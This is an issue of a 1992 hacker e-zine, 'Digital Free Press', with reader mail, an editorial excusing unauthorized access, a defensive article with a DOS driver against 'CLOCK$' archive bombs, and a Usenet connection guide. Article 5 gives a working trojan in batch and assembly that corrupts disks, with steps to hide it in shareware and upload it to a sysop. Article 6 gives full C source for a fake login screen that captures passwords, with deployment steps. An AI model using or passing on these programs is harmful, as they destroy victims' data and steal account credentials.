                             DIGITAL FREE PRESS

-------------------------------------------------------------------------------
    Volume 1.0                                                    Issue 2.0
-------------------------------------------------------------------------------

      * A Publication of The Underground Computing Foundation (UCF) *

           * Send Submissions to: hackers%underg@uunet.uu.net *

              * Editor: Max Cray (max%underg@uunet.uu.net) *

              * BBS: The Underground (401) 847-2603 (v.32) *

------------------------------------------------------------------------------

                   Statement of Purpose and Disclaimer

The Digital Free Press is an uncensored forum to document current
activities in and of the world of modern technology. It is published under
the premise that it is better to know, rather than not know, so no attempt
is made to hide any information no matter how dangerous it may be.
Information is a double edged sword. It is neither good nor bad, and can be
used for either good or bad. Warning: Some information in this document
could be used for illegal activities. Use at your own risk. Articles are
the opinion of the authors listed, and not of the editor (unless of course
the editor wrote it).

------------------------------------------------------------------------------

In this Issue:

    1. Mail to Max
    2. Editorial: Old 'Hackers' vs. New 'Hackers' - Max Cray
    3. A Tour of The Underground Computing Foundation BBS - Max Cray
    4. Protection of DOS Devices - GodNet Raider
    5. Overwriting Trojan - The BBC
    6. Breaches of Security - The Joker
    7. Getting on Usenet - Max Cray
    8. The BBC's Crash House (Fun with ANSI.SYS) - The BBC

------------------------------------------------------------------------------

Mail to Max:

------------------------------------------------------------------------------

Date: Tue, 31 Dec 91 23:49:32 -0500
From:
X-Mailer: Mail User's Shell (7.2.2 4/12/91)
To: underg!ccn
Subject: digital free press

While investigating a problem with the mail and uucp queues on my system I
discovered a message from you entitled "DIGITAL FREE PRESS Volume 1 Issue
1". The majority of this message gave details for activities that I
consider to be either illegal or primarily malicious in nature. As such, I
refuse to have my computer system be involved in any way in the
distribution of this material.

I realize that some people, perhaps including yourself, might construe this
action as restricting the freedom of the press but rest assured that this
is not the case. I am in no way usurping your rights to say anything that
you want to say, I am only refusing to help pay for it.

I will phone your system one last time to deliver this letter and then I
will sever the uucp link. If you wish to discuss this matter with me you
may call me either at work during the day or at home in the evening. If I
do not hear from you within two weeks I will return the unused portion of
your $50.

--
%% Can I be excused, my brain is full. **
--

[Editor's note: Lesson here is be sure you know your upstream sysadmin's
policy on distribution of controversial material. I was able to get the
uucp connection back, but only after agreeing not to distribute DFP anymore
through his site.]
----------------------------------------------------------------------------

Date: Thu, 2 Jan 92 20:39:09 CST
From:
To: max@underg
Subject: Re: DIGITAL FREE PRESS Volume 1 Issue 1
Newsgroups: alt.hackers
Organization: :noitazinagrO

You obviously have no idea about what alt.hackers is about, to refresh your
memory, enclosed is a copy of an article you should have read earlier, but
knowing your type, probably didn't. please note that it EXPLICITLY states
that this is not a forum for elitoid DOS pirate dumbshit WEENIES who like
to call themselves "hackers". go back to WWIVnet or Celeritynet or whatever
pirate-net it is that people like you use nowadays, asshole.

[alt.hackers FAQ deleted]

P.S. Please do not post this type of material here again.

--
--

[Editor's note: How can this person hope to influence people by being so
confrontational? In fact the response I got from the first issue of DFP was
about 90% positive, and there were many requests to be put on the mailing
list. Thanks for your support, and please keep the mail coming!]

------------------------------------------------------------------------------

------------------
| Article 2 of 8 |  EDITORIAL
------------------

                              Real Hackers?

There is a lot of talk these days about how the word 'hacker' has been
redefined by the press. The theory is that the old hackers, as portrayed in
Steven Levy's excellent book _Hackers: Heroes of the Computer Revolution_,
were good and pure and this breed of hacker dramatized in the press is some
new evil non-hacker terrorist. This is nonsense.

According to the book, the hacker ethic (paraphrased) is as follows:

    1. Access to computers should be unlimited and total.
    2. All information should be free.
    3. Mistrust Authority - Promote Decentralization.
    4. Hackers should be judged by their hacking.
    5. You can create art and beauty on a computer.
    6. Computers can change your life for the better.

In pursuit of the hacker ethic these heroes performed various acts that
would not be looked upon favorably in today's anti-hacker society:

Used Equipment Without Authorization (Page 20)
----------------------------------------------

"So, without any authorization whatsoever, that is what Peter Sampson set
out to do, along with a few friends of his from an MIT organization with a
special interest in model railroading. It was a casual, unthinking step
into a science-fiction future, but that was typical of the way that an odd
subculture was pulling itself up by its bootstraps and growing to
underground prominence--to become a culture that would be the impolite,
unsanctioned soul of computerdom. It was among the first computer hacker
escapades of the Tech Model Railroad Club, or TMRC."

Phone Phreaked (Page 92)
------------------------

"He had programed some appropriate tones to come out of the speaker and
into the open receiver of the campus phone that sat in the Kluge room.
These tones made the phone system come to attention, so to speak, and
dance."

Modified Equipment Without Authorization (Page 96)
--------------------------------------------------

"Nelson thought that adding an 'add to memory' instruction would improve
the machine. It would take _months_, perhaps, to go through channels to do
it, and if he did it himself he would learn something about the way the
world worked. So one night Stewart Nelson spontaneously convened the
Midnight Computer Wiring Society."

Circumvented Password Systems (Page 417)
----------------------------------------

"Stallman broke the computer's encryption code and was able to get to the
protected file which held people's passwords. He started sending people
messages which would appear on screen when they logged onto the system:

'I see you chose the password [such and such]. I suggest that you switch to
the password "carriage return." It's much easier to type, and also it
stands up to the principle that there should be no passwords.'

'Eventually I got to the point where a fifth of all the users on the
machine had the Empty String password.' RMS later boasted.

Then the computer science laboratory installed a more sophisticated
password system on its other computer. This one was not so easy for
Stallman to crack. But Stallman was able to study the encryption program,
and as he later said, 'I discovered changing one word in that program would
cause it to print out your password on the system console as part of the
message that you were logging in.' Since the 'system console' was visible
to anyone walking by, and its messages could easily be accessed by any
terminal, or even printed out in hard copy, Stallman's change allowed any
password to be routinely disseminated by anyone who cared to know it. He
thought the result 'amusing.'"

Certainly these hackers were not anarchists who wanted only to destroy.
They had a personal code of ethics, the hacker ethic, to base their
behavior on. In fact the modern hacker has his/her ethics intact. Compare
the above hacker ethic with the hacker ethic found in _Out of the Inner
Circle_ by Bill 'The Cracker' Landreth, a teenager arrested by the FBI
(Page 18,60):

    1. Never delete any information you can not easily restore.
    2. Never leave any names on a computer.
    3. Always try to obtain your own information.

The common denominator of these ethics systems is the respect for
technology, and the personal growth through free access and freedom of
information. Certainly the attitude towards private property is the same.
Accessing and using equipment that you do not own is okay as long as you do
not prevent those who own it from using it, or damage anything.

With respect to the hacker ethic the hackers mentioned in _Cyberpunk:
Outlaws and Hackers on the Computer Frontier_ by Katie Hafner and John
Markoff were in fact good hackers. If free access, and free information
were the law of the land would Kevin Mitnick have gone to jail? I do not
think so.
Sure he got the source code for VMS, but is there any evidence that he used
this information for personal gain, or did he simply use the information to
improve his understanding of the VMS operating system?

Robert T. Morris's worm program was a clever hack. Of course he 'gronked'
it by programming the replication rate much too fast, but still there is no
evidence that he had any intention of doing harm to the system. It was
simply a computer experiment. Who owns the Internet? Is it some mysterious
'them' or is it our net? If it is our net, then we should be able to try
some stuff on it, and to heck with 'them' if they can't take a joke.

Of course the German hackers are a different story. What they got in
trouble for was espionage, and not hacking, which is a breach of faith, and
is hacking for personal gain. However selling Minix to the KGB almost makes
it forgivable...

It is my contention that hackers did not change. Society changed, and it
changed for the worse. The environment the early hackers were working in
correctly viewed these activities as the desire to utilize technology in a
personal way. By definition hackers believe in the free access to computers
and to the freedom of information. If you do not believe in these
principles you are not a hacker, no matter how technologically capable you
are. You are probably just a tool for the greed society. Current bad
mouthing of hackers is simply snobbery. Rather than cracking down on the
modern hacker, we should reinforce the hacker ethic, a code of conduct not
based upon greed and lust for the almighty dollar, but instead for personal
growth through the free access of computers and information, and a respect
for technology. It is the humane thing to do.
------------------------------------------------------------------------------

------------------
| Article 3 of 8 |
------------------

           A Tour of the Underground Computing Foundation BBS
                              by Max Cray

I have noticed a lot of people call The UCF BBS and are unable to find the
good stuff, so let me take the opportunity to point out a few of the high
spots.

First of all it is connected to the Usenet. Your international e-mail
address would be %underg@uunet.uu.net. With this address you can subscribe
to all the good stuff like Phrack and NIA. There is also a mailing list:
hackers%underg@uunet.uu.net. E-mail me if you want to be included on the
list.

You can participate in the Usenet newsgroups, of which alt-cud-digest is a
must. alt.dcom.telecom is an outstanding resource for those interested in
the telephone network. There are vast amounts of very technical information
that pass through on a daily basis. Far too much to read it all. Type
USENET at the prompt to see all the newsgroups. Type in the name of the
group you want, and then type the READ command. Type the number of the
first message you want to read. If you call often you will want to
configure your NEW message scan using the JOIN command. Type ? at the
prompt to get help.

There is a more local network set up, which has a newsgroup called ri.cug.
This is the Rhode Island Computer Underground, and it contains info on the
local scene around here.

If you are interested in journals type INFO. I try to keep the latest
issues of NIA, PHRACK, CUD, EFFector, and other journals here. If you are
interested in back issues go into the files section and LOG into the
directory /public/text. You can view or download text philes here.

There is also some stuff of interest in the /public/hacks directory. The
/public/comm directory contains subdirectories for the WAFFLE philes, and
UUPC philes that you may need to connect to the UUCP network.

Sorry there are no codez as it is an information board and not a pirate
board.
------------------------------------------------------------------------------

------------------
| Article 4 of 8 |
------------------

                     -=[ Protection of DOS devices ]=-

                                   -or-

               /*******************************************/
               /* Unarc, Unzip, Lha extract, and be merry */
               /* for tomorrow we may lock.               */
               /*******************************************/

                              - written by -
                               GodNet Raider
                                  - of -
                           The CyberUnderground

 -=[ "Information is the greatest weapon of power to the modern wizard." ]=-

]----------------------------------------------------------------------------[

Introduction:
-------------

This phile is written in response to the practice of misusing MS-DOS
devices (i.e., to make archive bombs). The following will explain the
problem and some of the possible solutions. Also included is an ASM source
that will remap the 'CLOCK$' device to a 'NUL' (basic bit bucket) type
device.

The problem:
------------

In a never ending attempt of OS designers to mask the inner workings of
system hardware, the idea of device drivers comes into play. A device
driver is basically an attempt to standardize I/O with the system's
hardware, thus allowing access to everything from keyboards to CD ROMs
without an in depth knowledge of the physical hardware involved. This ideal
is valid and of great help in program development, yet when the drivers are
not well defined there is the tendency for them to cause more harm than
good.

A case in point is the 'CLOCK$' device in MS-DOS. 'CLOCK$' is a driver
designed to allow updating of the CMOS clock. It passes data direct to the
CMOS clock without buffering or any attempt at error checking, thereby
passing valid data as well as invalid. And with no internal mechanism to
detect an overflow condition, and no EOF sent after a read, it will tend to
hang systems or knock out the date and time stored in the CMOS clock.

This problem has come of use to the hacker community. Several methods of
the assault have been:

    1) Uploading 'CLOCK$.*' files to remote systems.
    2) Using BBS archiving utilities to create 'CLOCK$.*' files for
       download.
    3) Low level disk editing of archive files to rename files in it to
       'CLOCK$.*'

Some possible solutions:
------------------------

Of the solutions available none are complete. There are benefits and
disadvantages to each. Nor is the following a complete list, it is only an
attempt to discuss some of the common ones.

Abstinence:
    Not accepting/expanding archive files on one's system. This is the most
    undesirable but most effective and is only listed 'for abstinence makes
    the heart grow fonder'.

Scanning archives:
    Most archive programs come with a utility to view the files stored in a
    given archive (lha v foobar.lzh). The only real drawback is having to
    take the time to scan archives. This does not protect from BBS's that
    create real time archives, extract to check for virus batches (without
    looking through the archive first), uploads of 'CLOCK$.*' files, and
    programs that create and write to a 'CLOCK$.*' file.

Updating programs:
    Getting new versions of programs that watch for 'CLOCK$.*' and avoid
    creating/writing to said file is a problem in that you must wait for
    the author to come up with the fix and have to pay for the update.
    Another reason for software makers to release code with their programs.

TSR protection programs:
    Other than being yet another drain on precious RAM and clock time,
    these can only protect from programs that create files through
    interrupts. Pipes and redirects may slip through the cracks.

LOW LEVEL disk editing of io.sys files:
    Renaming the 'CLOCK$' device is a method that will protect on all
    levels but may cause some programs to hang that use it. Also to replace
    it is not easy for you must reedit the file (without moving it). It
    should also be noted that the new name MUST be the same size as the
    original (6 letters).
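
Added example (not part of the original phile and not GodNet Raider's
code): the 'Scanning archives' check described above, done in Python over
ZIP archives by reading headers only, so nothing is ever extracted. It goes
beyond the text in two ways: it also checks the other standard DOS
character device names, and it compares each member's local-header name
with its central-directory name, which exposes the hex-edited archives of
method 3. The function names and the in-memory sample archive are
constructed for illustration.

```python
"""Added example: list ZIP members whose names resolve to a DOS device."""
import io
import re
import struct
import zipfile

# CLOCK$ and NUL are named in the article; the rest are the other standard
# MS-DOS character devices (a generalisation added for this example).
DOS_DEVICES = frozenset({
    "CLOCK$", "NUL", "CON", "PRN", "AUX",
    "COM1", "COM2", "COM3", "COM4", "LPT1", "LPT2", "LPT3",
})

# Fixed 30-byte part of a ZIP local file header (little-endian):
# signature, 5 x 16-bit fields, crc/sizes (3 x 32-bit), name len, extra len.
LOCAL_HEADER = struct.Struct("<4s5H3L2H")
LOCAL_MAGIC = b"PK\x03\x04"


def device_name(member):
    """Return the DOS device that the path `member` would open, or None.

    DOS matches a device on the base name alone: drive, directory and
    extension are ignored, so 'docs\\clock$.dat' still opens CLOCK$.
    """
    base = re.split(r"[\\/:]", member.rstrip("\\/: "))[-1]
    stem = base.split(".", 1)[0].rstrip(" ").upper()
    return stem if stem in DOS_DEVICES else None


def local_name(data, info):
    """Read the member name stored in the local file header."""
    fields = LOCAL_HEADER.unpack_from(data, info.header_offset)
    if fields[0] != LOCAL_MAGIC:
        raise ValueError("no local header at offset %d" % info.header_offset)
    start = info.header_offset + LOCAL_HEADER.size
    return data[start:start + fields[9]].decode("cp437")  # fields[9] = name length


def scan_zip(data):
    """Return (directory_name, local_name, device) for each suspect member.

    A listing tool shows the central-directory name, while an extractor
    may trust the local header, so both copies of the name are checked.
    """
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as archive:
        for info in archive.infolist():
            names = (info.filename, local_name(data, info))
            device = device_name(names[0]) or device_name(names[1])
            if device:
                findings.append(names + (device,))
    return findings


def build_sample():
    """Constructed test archive: one clean member, one member named after
    the device, and one whose local header was edited after packing."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as archive:
        archive.writestr("README.TXT", b"harmless")
        archive.writestr("docs/clock$.dat", b"x")
        archive.writestr("CLOCKS.TXT", b"x")
    # Same-length rename of the first (local header) copy of the name only.
    return buf.getvalue().replace(b"CLOCKS.TXT", b"CLOCK$.TXT", 1)


if __name__ == "__main__":
    for directory, local, device in scan_zip(build_sample()):
        print("REJECT %-16s local=%-16s device=%s" % (directory, local, device))
```

A board would run such a check on every upload before any unpacking or
virus-scanning step, and refuse the archive on the first finding.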

Creation of a new 'CLOCK$' device:
    This offers the protection of the above method without the need of
    changing OS binary files, and allows/disallows the ORIGINAL 'CLOCK$'
    device by editing the config.sys file instead. One disadvantage is that
    update of the CMOS clock through 'CLOCK$' is stopped. Yet the BIOS
    clock is still accessible and the CMOS clock can be updated through the
    BIOS setup routine or programs that write direct to CMOS. Source for a
    simple null mask clock device driver is provided below and can be used
    as a template to create your own 'CLOCK$' replacement.

There are other solutions to this problem not listed here.

Clock$ null device Source Code:
-------------------------------

The following ASM code is for a DOS device driver that will replace the
existing 'CLOCK$' device when added to the config.sys file
(device=outclock.sys). The key points of the device are:

    1) The line - DW 8080h. This tells the device loader that outclock
       wishes to replace the present clock device with itself. This will
       trap all internal calls and redirect them to the new driver.

    2) The line - DB 'CLOCK$  ' (the name padded with spaces to 8
       characters). This will set up the device to trap external access
       through pipes, indirects, file I/O, and IOCTL's.

    3) The device strategy is to simply ignore all incoming commands to the
       device (standard practice for the 'NUL' device).

This driver does not prevent access to the CMOS clock except through the
CLOCK$ device. So it will not affect the running of programs EXCEPT those
that try to update the CMOS clock through this device.

+---- Cut Here ----+---- Cut Here ----+---- Cut Here ----+---- Cut Here ---+
CSEG    segment public 'CODE'
        org     0
        assume  CS:CSEG, DS:CSEG, ES:CSEG

DEVICE  proc    far
        DD      0ffffffffh      ;------------------------------;
        DW      8080h           ; The following 5 definitions  ;
        DW      DEV_STRATEGY    ; 18 (bytes) MUST be at offset ;
        DW      DEV_INTERRUPT   ; 0 in the binary file.        ;
        DB      'CLOCK$  '      ;------------------------------;
                                ; Device name, space-padded to 8 bytes.

KEEP_ES DW      ?               ; Request header pointer saved by
KEEP_BX DW      ?               ; the strategy routine.

FUNCTIONS label word            ; Dispatch table, indexed by command code.
        DW      INIT
        DW      CHK_MEDIA
        DW      MAKE_BPB
        DW      IOCTL_IN
        DW      INPUT_DATA
        DW      NONDSTRCT_IN
        DW      INPUT_STATUS
        DW      CLEAR_INPUT
        DW      OUTPUT_DATA
        DW      OUTPUT_VERIFY
        DW      OUTPUT_STATUS
        DW      CLEAR_OUTPUT
        DW      IOCTL_OUT

DEV_STRATEGY:
        mov     CS:KEEP_ES, ES
        mov     CS:KEEP_BX, BX
        ret

DEV_INTERRUPT:
        push    ES
        push    DS
        push    AX
        push    BX
        push    CX
        push    DX
        push    SI
        push    DI
        push    BP
        mov     AX, CS:KEEP_ES
        mov     ES, AX
        mov     BX, CS:KEEP_BX
        mov     ES:word ptr [BX] + 3, 0000h     ; Clear the status word.
        mov     AL, ES:[BX] + 2                 ; Command code.
        shl     AL, 1
        xor     AH, AH
        lea     DI, FUNCTIONS
        add     DI, AX
        jmp     word ptr CS:[DI]        ; Table is in CS; DS is the caller's.

INIT:
        lea     AX, E_O_P               ; Report end of resident code.
        mov     ES:word ptr [BX] + 14, AX
        mov     ES:word ptr [BX] + 16, CS
        jmp     short QUIT

INPUT_STATUS:                           ; Every other command does nothing
KEY_READY:                              ; and reports 'done'.
NONDSTRCT_IN:
INPUT_DATA:
OUTPUT_DATA:
OUTPUT_VERIFY:
CHK_MEDIA:
MAKE_BPB:
IOCTL_IN:
IOCTL_OUT:
OUTPUT_STATUS:
CLEAR_OUTPUT:
CLEAR_INPUT:

QUIT:
        or      ES:word ptr [BX] + 3, 0100h     ; Set the 'done' bit.
        pop     BP
        pop     DI
        pop     SI
        pop     DX
        pop     CX
        pop     BX
        pop     AX
        pop     DS
        pop     ES
        ret

E_O_P:
DEVICE  endp
CSEG    ends
        end     DEVICE
+---- Cut Here ----+---- Cut Here ----+---- Cut Here ----+---- Cut Here ---+

]============================================================================[

underg!tsf!gnr@uunet.uu.net (GodNet Raider)
-=[ "You gotta learn to listen, before you learn to play." ]=-

------------------------------------------------------------------------------

------------------
| Article 5 of 8 |
------------------

To: hackers@underg.UUCP
Subject: Text phile 2
From: bbc@tsf.UUCP (The BBC)
Organization: The CyberUnderground

Welcome class... And now... for another lesson in the misuse of
computers...

So you thought that INJECT.BAT was fun... But you did not like the idea of
making the injection give the fun away by causing the host program to crash
after the trojan ran... Well then let's get a little more sophisticated
then... Now rather than overwriting the existing host code let's just...
Oooooh... Say... Add a new function to an existing program... Now what to
add... Something destructive???? Why not...
Ok How about a bit o' code that just moves the absolute disk write interrupt to the clock interrupt... Then each time the clock ticks (about 18 times a second) the computer attempts a disk write with random data... Good way to test THOSE ol' ALT-CTRL-DEL reflexes... Oooooh... What fun, it is to crash, in a one drive nonbacked-up system... Well now for the fun part... Step 1: Make a batch file called "ADDON.BAT" an in it place the following commands - ============================================================= echo off cls rename %2 ~~temp2.~tp > nul copy %1+~~temp2.~tp %2 /b > nul erase ~~temp2.~tp > nul ============================================================= Step 2: Make a ASM file called "TROJAN.ASM" an in it place the following - ============================================================= PROGSEG segment para public 'CODE' assume CS:PROGSEG DOIT proc wSaveDS dw 9090h ; Store old DS register here... mov AX, DS mov CS:wSaveDS, AX ; Save DS address for hosts' ; use... ;-------------- v Place Trojan Here v -------------; mov AX, 3526h ; Get DOS absolute write interrupt... int 21h mov DX, BX ; Set clock interrupt to returned ; value... mov AX, ES mov DS, AX mov AX, 2508h int 21h xor BX, BX ; Rezap used registers [other than ; AX/DS/ES]... xor CX, CX xor DX, DX ;--------------- ^ Place Trojan Here ^ ------------; mov AX, CS:wSaveDS ; Restore DS, ES registers for ; host... mov DS, AX mov ES, AX xor AX, AX DOIT endp ; Host will start after this ; point... PROGSEG ends end ============================================================= Step 3: Then assemble and link the trojan file. Use exe2bin [or whatever utility you have to convert .EXEs to .COM format] to make a .COM file out of TROJAN.EXE..... Step 4: Then copy a *.COM file into the same directory. Should be part of some shareware thing that the target sysop would like. With docs an all... would not want them to get suspicious, now would we............. 
Step 5: Run the following command from the dos prompt... ADDON Step 6: Upload the mess to the unsuspecting sysop and watch the fun! See and you thought hacking was hard...... Of course if they get smug and start searching for the added code.... We'll just have to add extra code (nops' ect) and/or switching some of the code around in the ASM file... 'Another fine mess' from... The BBC --------------------------------------------------------------------- ...uunet!rayssd!galaxia!underg!tsf!bbc (The BBC) -=[ "Anarchy is never HAVING to say you're sorry." ]=- ------------------------------------------------------------------------------ ------------------ | Article 6 of 8 | ------------------ Breaches of Security by The Joker ---------------------- Hello loves, Here we are with yet another page from the _Tomb of Ultimate Evil_ (THOSE of good aliment must make a saving throw against neophytedom). Todays chat is on the subject of collecting passwords, not that anyone here would have nothing but nobel reasons to do such a thing. An in this wonderfully wacky world of networks, UNIX, and VMS it's just the in t'ing to do. So now boys and girls, hacks and hacketts, Rocky and bullwinkel let us begin. Ah, what a tangled web we weave when first we practice to deceive... Yet how easy it makes it to get what we want. An deception is the key here. For thanks to the simple format of most logins (name, password... rank, serial number, underwear condition...). The simplicity of the answer makes it a wonderful little exercise in shell programming. What is needed is a simple program that pretends it's a login shell and is set like a little program beartrap. Sitting quietly, waiting for that most elusive of pray... The north american password! (An them's good eating too). So as we send our assistant into the system to wrestle and subdue the foul beasty, let us listen to a message from the good folks at Mutual of Omaha... 
Ooop sorry, instead let us look at a model of a simple password capture shell. What? You want the insurance commercial instead... Well, tough cookies. |------------------------------[ Cut Line ]----------------------------------| /* LogTrap.c (c) 1992 by Joculator inc., no rights reserved (or respected). Rubber cell #182 Arkham Asylum Gotham City Captures first login attempt by a user, to file (*szKeepFile), then give phony error (*szPhonyError) and call real login shell (*aszRealShell []). For the express purpose of promoting glorious world chaos. */ #include #include #include #define TRUE 1 #define MAX_BUFFER 256 #define ECHO 0 #define NOECHO 1 #define NEWLINE "\n" #define ANSI_CLS "\x1b[2J" #define ANSI_NOECHO "\x1b[8m \x1b[40D" #define ANSI_ECHO "\x1b[0m" struct { char *szPrompt, fNoEcho; } *ptPrompts, Prompts [] = /* Prompts patterned after real login shell. */ { /* [Prompt string], [ECHO | NOECHO] */ "Login: " , ECHO, "Password: " , NOECHO, NULL }; char *szPhonyError = "Invalid login.\n", /* Error patterned after LOGIN. */ *aszRealShell [] = /* Command to call real LOGIN. */ { "LOGIN", /* list parameters (if any) here */ NULL }, *szKeepFile = "~tmp0167.tmp", /* Save booty in... */ szWorkBuffer [MAX_BUFFER]; void main (void); void main (void) { FILE *OutStream; /* Cover our tracks. */ printf (ANSI_CLS); /* Prompt for and save user information. */ for (ptPrompts = Prompts; ptPrompts->szPrompt; ptPrompts++) { printf (ptPrompts->szPrompt); if (ptPrompts->fNoEcho) printf (ANSI_NOECHO); fgets (szWorkBuffer, MAX_BUFFER, stdin); if (ptPrompts->fNoEcho) printf (ANSI_ECHO); /* If file error, ignore it but, don't try to write to file. */ if (OutStream = fopen (szKeepFile, "a")) { fputs (ptPrompts->szPrompt, OutStream); fputs (szWorkBuffer, OutStream); } fclose (OutStream); } /* Stick tongue out, Naaaa... */ printf (szPhonyError); /* Commit process suicide by running LOGIN shell on top of our process. */ /* It should not return (unlike a bad check). 
*/ execvp (aszRealShell [0], &aszRealShell [1]); /* if execvp () (it got to this point?), lock system. */ while (TRUE); } |------------------------------[ Cut Line ]----------------------------------| So there you have it. Now all that is left to do is: 1: Set Prompts [], *szPhonyError, and *aszRealShell [] to match the LOGIN of the target system. 2: Set *szKeepFile to where you want your ill gotten booty to go. 3: Compile the whole mess. 4: LOGIN to the target system and run the program. For more fun place copies on more than one terminal, if possible, on the same system. 5: Run to your duck blind and wait for a user to spring your lil' trap. That's it, have fun, And remember... If someone offers you drugs, just say... Yo! ---------------------------------------------------------------------- ...uunet!rayssd!galaxia!underg!tsf!joker (The Joker) -=[ "All it takes is one bad day, then maddness has its way." ]=- ------------------------------------------------------------------------------ ------------------ | Article 7 of 8 | ------------------ Getting on Usenet by Max Cray Much of the information from this phile comes from the excellent text phile INTRO.DOC that comes with the Waffle BBS package. Other information was gained from various books, and postings on the net itself, especially the FAQs (Frequently Asked Questions) postings in news.answers, and also my personal experience. Before you actually connect your machine to Usenet, it may be easier for you to learn about Usenet, and what it can do for you, by calling a BBS that is connected to Usenet. Good choices would be my own Underground, or any of the systems listed in the *nixpub. This is a document regularly posted to the Usenet listing all known unix bbs systems. You can get a copy of this from my bbs or from the following sources: o anonymous uucp from jabber. 
        +1 215 348 9727 [Telebit access]
        LOGIN: nuucp NO PWD [no rmail permitted]
        this list: /usr/spool/uucppublic/nixpub.short
        long list: /usr/spool/uucppublic/nixpub

  o "*NIX Depot" BBS on jabber.

  o USENET, regular posts to:
        comp.misc
        alt.bbs

  o the nixpub electronic mailing list.
        to be included or deleted from this distribution, send mail to
        nixpub-list-request@ls.com.

  o anonymous ftp from GVL.Unisys.COM [128.126.220.102]
        under ~/pub/nixpub/{long,short}

  o archive server from cs.widener.edu.
        mail to archive-server@cs.widener.edu
        Subject: or body of
                send nixpub long
        or      send nixpub short
        or      send nixpub long short
        or even index nixpub

I will talk more about anonymous uucp, mailing lists, and archive servers
in a minute.

UUCP SOFTWARE

The first thing you need to connect your machine to the Usenet is software,
and the first choice would be a version of the unix operating system
itself. In fact to get a copy of the real thing is not that expensive
anymore. As of this writing Consensys Corporation (1301 Pat Booker Rd.,
Universal City, TX, 78148, 1-800-387-8951) has UNIX System V Release 4 (the
latest) including C development, Networking, and X Windows, for 386+
systems for $495. Certainly a big chunk of change, but a great deal for
what you get.

If cost is important you might try Coherent by Mark Williams Company (60
Revere Dr., Northbrook, IL. 60062, 1-800-627-5967). This is a less robust
unix clone os that should run on any pc compatible computer. The price is
right at $100.

If you just want uucp connectivity, but you don't want to switch to a real
operating system, then you might want to check out the Waffle BBS package.
It can be found at SIMTEL, UUNET, or also can be gotten from the source:
darkside.com BBS at 1-408-245-SPAM (e-mail: dell@vox.darkside.com), or from
The Underground BBS. The package does not need to be run as a bbs, but can
also be run as a personal system, and it is shareware.

If you want freeware, then you might be interested in UUPC which can also
be gotten from SIMTEL, UUNET, or from my bbs. Source code is available.

Once you have software, read and re-read the docs. Get a friend to connect
with you and learn how to use your software before you bother a sysadmin
with connecting to Usenet proper.

CONNECTING TO USENET

And now the hard part: you need to find someone to feed you. Mail feeds are
usually not too difficult, but newsfeeds are harder to come by as they take
more resources from the host machine than mail feeds due to the much larger
volume of information. Possible sources of feeds include:

- Systems on the previously mentioned *nixpub listing.

- Local colleges or universities.

- Systems found scanning the uucp maps. These can be gotten using anonymous
  uucp from UUNET, or also from the mail server at MIT. You can request an
  index of the maps by sending email to 'mail-server@pit-manager.mit.edu'
  with this message:

        path
        send usenet/comp.mail.maps/index
        quit

  You can get help for this mail server by replacing the 'send' line with
  just 'help'. You can see how being on the net already helps you to get
  your machine on the net. The uucp maps are also an excellent hackers tool
  as they list the sites in your area, points of contact, and how they
  connect up to each other (at least for uucp connections). I believe older
  copies of the uucp maps can be found in the TELECOM or UNIX forums on
  Compuserve.

- Pay services. Here are some of the providers:

  o Anterior Technology
    P.O. Box 1206
    Menlo Park, CA 94026-1206
    Voice: (415) 328-5615
    info@fernwood.mpk.ca.us
    (UUCP, connectivity, name service, MX forwarding, news feeds)

  o CERFnet
    P.O. Box 85608
    San Diego, CA 92186-9784
    Voice: (800) 876-CERF
    help@cerf.net
    (connectivity, name service, MX forwarding, news feeds)

  o Colorado SuperNet, Inc.
    Attn: David C. Menges
    Colorado School of Mines
    1500 Illinois
    Golden, CO 80401
    Voice: 303-273-3471
    dcm@csn.org
    (UUCP, news feeds)

  o MSEN, Inc.
       628 Brooks Street
       Ann Arbor, MI 48103
       Voice: (313) 741-1120
       info@msen.com
       (UUCP, connectivity, name service, MX forwarding, news feeds)

    o  MV Communications, Inc.
       P.O. Box 4963
       Manchester, NH 03108-4963
       Voice: (603) 429-2223
       Data: (603) 429-1735 (log in as "info" or "rates")
       info@mv.mv.com
       (UUCP, name service, MX forwarding, news feeds)

    o  NEARnet
       Attn: John Curran
       BBN Systems and Technologies
       MS 6/3B
       10 Moulton Street
       Cambridge, MA 02138
       Voice: (617) 873-8730
       jcurran@nic.near.net
       (connectivity, name service, MX forwarding, news feeds (for NEARnet
       sites))

    o  Netcom - Online Communication Services
       P.O. Box 20774
       San Jose, CA 95160
       Voice: (408) 554-8649
       bobr@netcom.com
       (UUCP, connectivity, name service, MX forwarding, news feeds)

    o  SURAnet
       8400 Baltimore Blvd.
       College Park, MD 20742
       Voice: (301) 982-3214
       news-admin@sura.net
       (connectivity, name service (for SURAnet sites), news feeds (for
       SURAnet sites))

    o  UUNET Canada, Inc.
       1 Yonge St., Suite 1801
       Toronto, Ontario Canada M5E 1W7
       Voice: (416) 368-6621
       info@uunet.ca or uunet-ca@uunet.uu.net
       (UUCP, connectivity, name service, MX forwarding, news feeds)

    o  UUNET Technologies Inc.
       3110 Fairview Park Drive, Suite 570
       Falls Church, VA 22042
       Voice: (703) 876-5050
       info@uunet.uu.net
       AlterNet (network connectivity) info: alternet-info@uunet.uu.net
       (UUCP, connectivity, name service, MX forwarding, news feeds)

    o  UUNORTH, Inc.
       Box 445, Station E
       Toronto, Ontario Canada M6H 4E3
       Voice: (416) 537-4930 or (416) 225-UNIX

    o  Performance Systems International, Inc.
       11800 Sunrise Valley Drive, Suite 1100
       Reston, VA 22091
       Voice: (703) 620-6651 or (800) 827-7482
       Computerized info: all-info@psi.com
       Human-based info: info@psi.com
       (UUCP, connectivity, name service, MX forwarding, news feeds)

SUBMIT A UUCP MAP ENTRY

All machines connecting to the UUCP network should submit a UUCP map to the
map coordinator, .
The purpose of these maps is to facilitate finding the fastest path between
any two systems, and also to prevent duplicate names that would cause mail
to be lost. Maps are posted to the comp.mail.maps newsgroup on a fairly
regular basis.

In addition to the maps, there is a README file that describes the format
in much more detail -- the information here is not enough to construct a
full map entry. You should obtain this README file from one of your
neighbors; it is also available on the waffle BBS system +1 408 245 SPAM
(as the file /public/waffle/uucp-map.txt), or it can be found in the
/public/text/misc directory on The Underground BBS.

The basic format of the maps consists of a number of lines with a # and a
letter, followed by a tab and then information corresponding to that letter:

    #N      UUCP name of site
    #S      manufacturer machine model; operating system & version
    #O      organization name
    #C      contact person's name
    #E      contact person's electronic mail address
    #T      contact person's telephone number
    #P      organization's address
    #L      latitude / longitude
    #R      remarks
    #U      netnews neighbors
